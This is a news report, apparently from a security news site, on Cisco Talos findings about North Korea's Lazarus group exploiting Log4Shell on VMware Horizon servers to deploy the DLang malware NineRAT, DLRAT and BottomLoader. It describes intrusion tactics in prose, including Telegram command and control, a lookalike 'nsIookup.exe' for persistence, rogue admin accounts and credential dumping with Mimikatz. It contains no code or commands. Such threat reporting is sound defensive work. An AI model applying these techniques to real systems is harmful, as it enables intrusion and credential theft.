12 December 2023

North Korea’s Lazarus uses Log4j exploits to deliver novel DLang-based malware


North Korea’s Lazarus uses Log4j exploits to deliver novel DLang-based malware

The North Korean hacking group known as Lazarus has orchestrated a new campaign that exploits a two-year-old vulnerability (CVE-2021-44228, aka Log4Shell) to deploy three never-before-seen malware families written in the DLang programming language.

The new malware tools are two remote access trojans (RATs), one of which, dubbed “NineRAT” by Cisco’s Talos researchers, uses Telegram bots and channels as a medium of command and control (C2) communications. The second RAT, non-Telegram-based, is tracked as “DLRAT.” The third malware is a DLang-based downloader named “BottomLoader.”

The new campaign, dubbed “Operation Blacksmith,” targets manufacturing, agricultural and physical security companies.

According to the threat intelligence team, NineRAT was initially built around May 2022 and was first used in this campaign as early as March 2023 against a South American agricultural organization. The second time NineRAT has been observed in September 2023 targeting a European manufacturing entity.

“NineRAT … indicates a definitive shift in TTPs from APT groups falling under the Lazarus umbrella with the increased adoption of malware being authored using non-traditional frameworks such as the Qt framework, including MagicRAT and QuiteRAT,” the team said.

Talos said they found some overlap with the malicious attacks reported by Microsoft in October 2023 attributing the activity to Onyx Sleet (aka Plutonium or Andariel). More recently, Andariel, which is believed to be a division within Lazarus, has been seen stealing key technologies from South Korean defense firms, including anti-aircraft weapons.

“NineRAT uses Telegram as its C2 channel for accepting commands, communicating their outputs and even for inbound and outbound file transfer. The use of Telegram by Lazarus is likely to evade network and host-based detection measures by employing a legitimate service as a channel of C2 communications,” Talos noted.

The RAT implements a dropper binary, which writes two components on the disc and then deletes itself, and an instrumentor called nsIookup.exe, which executes the components and takes part in persistence mechanism.

The BottomLoader downloader is designed to download and execute the next stage payload (HazyLoad) from a remote host and the DLRAT malware is used for system reconnaissance.

“This particular attack observed by Talos involves the successful exploitation of CVE-2021-44228, also known as Log4Shell, on publicly facing VMWare Horizon servers, as a means of initial access to vulnerable public-facing servers. Preliminary reconnaissance follows the initial access leading to the deployment of a custom-made implant on the infected system,” the team said.

Upon performing the initial reconnaissance, Lazarus deployed HazyLoad, a proxy tool used to establish direct access to the infected system without having to repeatedly exploit CVE-2021-44228. The hackers have created an additional local admin account leveraging it for downloading and using credential dumping utilities such as ProcDump and MimiKatz. Talos said that such behavior differs from previous Lazarus campaigns, where the threat actor created unauthorized user accounts at the domain level.


Back to the list

Latest Posts

FIN7 cybercrime gang offers new EDR bypass tool on dark web

FIN7 cybercrime gang offers new EDR bypass tool on dark web

AvNeutralizer is being advertised for prices ranging between $4,000 and $15,000 on various cybercrime forums.
17 July 2024
Critical Apache HugeGraph vulnerability exploited in the wild

Critical Apache HugeGraph vulnerability exploited in the wild

Users are strongly recommended to upgrade to the fixed version as soon as possible.
17 July 2024
TAG-100 cyberspies target Citrix, F5, Cisco appliances in at least 10 countries

TAG-100 cyberspies target Citrix, F5, Cisco appliances in at least 10 countries

The threat actor has employed the Go-based backdoors Pantegana and SparkRAT for post-exploitation.
17 July 2024